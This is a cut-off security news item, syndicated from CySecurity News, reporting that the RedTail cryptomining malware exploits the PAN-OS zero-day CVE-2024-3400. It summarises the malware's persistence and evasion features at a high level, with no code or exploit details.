RedTail Cryptominer Exploits Critical Zero-Day in PAN-OS

A new wave of cyberattacks has been reported, leveraging a critical zero-day vulnerability in Palo Alto Networks’ firewall software, PAN-OS. The flaw, identified as CVE-2024-3400 and assigned a maximum CVSS score of 10.0, enables unauthenticated attackers to execute arbitrary code with root privileges, significantly compromising the security of affected systems. 

Researchers from Akamai have observed that the RedTail cryptomining malware is exploiting this vulnerability. The malware is notably sophisticated, exhibiting a deep understanding of cryptomining operations. Unlike typical cryptomining software that uses public mining pools, RedTail’s operators have established private mining pools or proxies. This approach allows for greater control over mining outcomes despite the higher operational and financial costs involved. 
Updated Tools and Techniques: The latest version of RedTail, active since late April, includes several updated tools: 
Encrypted Mining Configuration: This adds a layer of security and obfuscation to the malware’s operations. 
Self-Process Debugging: A tactic to evade analysis and hinder detection.

Cron Job Integration: Ensures persistence by automatically restarting the malware after the system reboots. 

Usage of RandomX Algorithm: Boosts mining

[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents

Read the original article: